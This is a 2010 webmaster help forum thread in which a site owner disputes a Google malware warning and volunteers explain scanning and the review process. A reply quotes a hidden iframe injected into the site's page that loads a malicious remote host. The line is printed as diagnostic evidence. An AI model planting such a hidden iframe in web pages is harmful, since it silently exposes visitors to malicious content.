Categories: Malware & hacked sites :

Clean site listed as suspicious!

Showing 1-10 of 10 messages
Clean site listed as suspicious! terekidi 2/19/10 8:20 PM
I have read the FAQs and checked for similar issues: YES
My site's URL is: pazzoracing.com
Description (including timeline of any changes made):
The site has been launched way over a year ago and last update to files on the site was made back in October 09.
About a month ago the site has been marked as harmfull or suspicious. We've checked the site with all possible online scan utilities (Norton, McAffee and a few others). They all came out clean.

We've posted a review request to Google on Jan 10, 2010 and didn't get a single reply. Then, I went to StopBadWare website and request the review there. It took them a month!!!! to review it (site lost tons of business) and they e-mail to us was basically: "site is clean, harmfull flag has been removed". Wow.. geee.. thanks. A month later, a false tagging by Google cost our business a lot of money. Ok, it was removed... next day, it's tagged as harmfull again! What the hell is going on? Is this a joke?

Ok, knowing the fact that Google doesn't care about anybody and uses it's gestapo style site flagging sites, i decided to submit another review to StopBadWare.
But oh no! I can't! That's what StopBadWare says:

Review requested: Jan 11th 2010
Review closed: Feb 16th 2010
Review status: closed-URL no longer reported by StopBadware partners

GOOGLE! WHAT IS GOING ON! It's not the first business i saw this happen to. I smell a VERY large lawsuit coming up. But it would be nice to get some answers first.
Re: Clean site listed as suspicious! Kaleh 2/20/10 5:34 AM
The site has been launched way over a year ago and last update to files on the site was made back in October 09.
About a month ago the site has been marked as harmfull or suspicious. We've checked the site with all possible online scan utilities (Norton, McAffee and a few others). They all came out clean.


FWIW, every scan utility works differently and focuses on different types of issues .  None of them are capable of detecting every possible problem.  A "clean" scan with any utility only means that the particular utility did not detect the types of things that it checks for at that particular point in time.  It does not mean that another scanner is "wrong" if that other scanner identified an issue. It also does not mean that another scanner is "wrong" if you find several other scanners that provide you with a "clean" result.

As far as SiteAdvisor and SafeWeb go, when they check a site and provide a "clean" report that is accessible to anyone that goes to their site to see what kind of information is there, I have never seen a date associated with their report.  Without knowing the date that report was generated, no one has any idea how current that information is.  Sites are hacked constantly.  A site that was fine five minutes ago, may not be OK right now.

There is a lot more to evaluating a site that has been identified as suspicious/malicious than using free on-line scanning tools.  If you had not already utilized a guide that steps you through the process of thoroughly evaluating your site, it is never too late to start.  If you aren't able to identify the problem on your own (or with help from those on forums such as this), you may need to consider hiring someone who will have full access to your site, to work on the issue.

Tips for Cleaning & Securing your Website - StopBadware.org
http://www.stopbadware.org/home/security

How to remove the "This site may harm your computer"
http://25yearsofprogramming.com/blog/20071223.htm

How to prevent your site from getting hacked. How to repair a damaged site. Website security precautions
http://25yearsofprogramming.com/blog/20070705.htm


We've posted a review request to Google on Jan 10, 2010 and didn't get a single reply.

Did you check for messages in your Webmaster Tools account?  Did you actually "Request a Review" and not "Site Reconsideration?"  Unless you have set up message forwarding in Webmaster Tools, you may not get any updates, other than those provided through Webmaster Tools.  The initial notification that the site is being flagged will be sent to a variety of rather "generic" email addresses that are commonly used by site owners/administrators, unless message forwarding has been enabled and Google knows exactly where to send such automated communication.


Then, I went to StopBadWare website and request the review there. It took them a month!!!! to review it (site lost tons of business) and they e-mail to us was basically: "site is clean, harmfull flag has been removed". Wow.. geee.. thanks.

When StopBadware receives a request for an independent review, the first thing they do is request a review from Google.  The records in their database are updated on a regular basis with the data provided through Google's SafeBrowsing database.  If Google has cleared the site by the time that StopBadware requests that review from Google, StopBadware will close the review based upon the fact that the "partner" is no longer flagging the site. In this case, it is not StopBadware pronouncing the site clean ... it is Google.  When they request a review from Google, and the site is still flagged, there are subsequent steps that are taken.  The length of time to complete that review varies, but I can't speak for StopBadware about how involved their review became in this particular case.  However, the end result does not appear to be that StopBadware decided your site was clean ... it appears that during one of Google's scans they cleared the site, and StopBadware updated their records to reflect that.


A month later, a false tagging by Google cost our business a lot of money. Ok, it was removed... next day, it's tagged as harmfull again! What the hell is going on? Is this a joke?


It is very rare for a situation that is considered to be a "false tagging" by a site owner to truly be an error. Most people who come here with that type of concern, are quickly shown where the problems are.  Some situations are more challenging though, and it is more difficult for someone on the outside to be able to identify the problem. Rotating ads,among other possibilities, are often the cause of intermittent issues with a site being flagged, .  Sometimes the problem is with an intermittent problem that is a server-wide issue that affects more than just a single site.  The hackers are getting more and more sophisticated with the methods they use to evade detection, making some situations very challenging to troubleshoot and subsequently causing site owners to believe that there is not (and never was) a problem, even when it can eventually be proven that there was a legitimate issue. 

Google has encountered suspicious behavior on your site 9 times in the last 90 days.  If you have not done any site clean-up during that point in time, and there was any point during which your site was not flagged, it is very highly likely that something is going on that is random in nature.  As previously mentioned, there can be a number of possibilities that cause the intermittent behavior, that make troubleshooting very challenging.  Unfortunately, I don't see any indication that you have previously posted here or on the BadwareBusters forum (associated with StopBadware) allowing anyone to try to help you nail this down.


Ok, knowing the fact that Google doesn't care about anybody and uses it's gestapo style site flagging sites, i decided to submit another review to StopBadWare.

But oh no! I can't! That's what StopBadWare says:

Review requested: Jan 11th 2010
Review closed: Feb 16th 2010
Review status: closed-URL no longer reported by StopBadware partners


There can be a lag in time before StopBadware updates their records to reflect the current status that Google has for the site.  If the site is bouncing back and forth when Google scans it, there will be more inconsistency in what you see through StopBadware.  However, instead of waiting for StopBadware to update their records and make an independent review available to you, I would suggest that you initiate that review through your Google Webmaster Tools account.  Better yet, you should really use the resource material available to thoroughly evaluate your site and make sure that you have addressed all possible vulnerabilities that could be causing you a problem now (or in the future.)  Then ... "Request a Review" through Google Webmaster Tools.

You should also check Webmaster Tools [Labs | Malware Details] to see if Google has provided any helpful information there.  In addition, you should check the red malware warning bar on your Webmaster Tools Dashboard for the [More details] link which should display a page where Google may have identified sample pages that they had issues with.


GOOGLE! WHAT IS GOING ON! It's not the first business i saw this happen to. I smell a VERY large lawsuit coming up. But it would be nice to get some answers first.

Site owners do sometimes come here presenting a one-sided view of their situation, and claim their site has been "unfairly flagged" before they give anyone an opportunity to try to help.  Quite often, they come here to vent, and do not bother to provide enough detail for readers (or the volunteer helpers here) to be able to look into the situation for themselves.  Most of those who participate in the process of information sharing and allow others to try to work with them, do find that there was a problem that needed to be resolved.  It's difficult to say whether there is substance to other complaints, as they do not come back to participate in an interactive dialogue with anyone.  There's usually two sides to every story ... but sometimes we only hear one side of the story here, because the OP is only interested in complaining, not in working their way through the situation.

That said, perhaps others will be able to find something for you to latch onto, as far as why your site is being flagged.  However, even if they don't, that still does not mean that Google is wrong.  It may just be that without full access to your site, no one is going to be able to get to the bottom of the issue.


Re: Clean site listed as suspicious! Phil Payne 2/22/10 1:41 PM
It's certainly listed:

http://www.google.com/safebrowsing/diagnostic?site=pazzoracing.com
Re: Clean site listed as suspicious! terekidi 2/22/10 1:51 PM
I know, but it's clean. I've just sumbitted another review request.
Re: Clean site listed as suspicious! JohnMu 2/22/10 1:57 PM
Hi terekidi
When we last checked your site's URL (on Feb 20) at  https://pazzoracing. com/ we found the following at the bottom of the page:
</html><iframe src="http://u0r. in:8080/ts/in.cgi?pepsi105" width=125 height=125 style="visibility: hidden"></iframe>
The site included through the "iframe" element appears to be or to have been malicious.

I assume this is not content that you added yourself, so I would recommend working out where it might be coming from or how someone was able to add it to your site. If you did not remove this yourself, I would recommend contacting your hoster to find out more.

Hope it helps!
John
Re: Clean site listed as suspicious! terekidi 2/22/10 2:05 PM
John,
As I said before, we had one techie help us, and as far as i can see, the site is clean. Could you verify that?
I think it should be good now and if yes, when can it be marked as "safe" again?
Re: Clean site listed as suspicious! webado 2/22/10 10:18 PM
Did you find how the malware had gotten onto the site? What steps did you take to clean it up and to prevent future incidents? If you did nothing then it's fluke that the site appears clean now and   malware will recur randomly. You need to plug the hole.
Re: Clean site listed as suspicious! terekidi 2/22/10 10:58 PM
We had a tech specialist do some intensive work to illuminate the issue (which i think he did), all passwords have been also changed (FTP, database, Control  Panel).
So yes, the mallware was removed and the new passwords are set. The passwords will be changed more frequiently.
Re: Clean site listed as suspicious! Kaleh 2/23/10 2:34 AM
Currently, one of the more common causes of sites being hacked is that a PC used to access the site for administration purposes, is infected. Did you check local machines for malware that may be capturing the login credentials?  You may need to use multiple products, to find the right one, to detect and remove this type of malware form the local machine.

This is one of several references related to the type of iframe reference that was found on your site:

http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-prevalent/
Re: Clean site listed as suspicious! terekidi 2/23/10 8:26 AM
I don't use PCs anymore. Since December I switched to Mac. I am well aware of the trojan viruses that steal passwords for CuteFTP and other software and also viruses that can intercept any connections on the network. It should be all good now.

Btw, thanks Google - the site is now marked as Safe!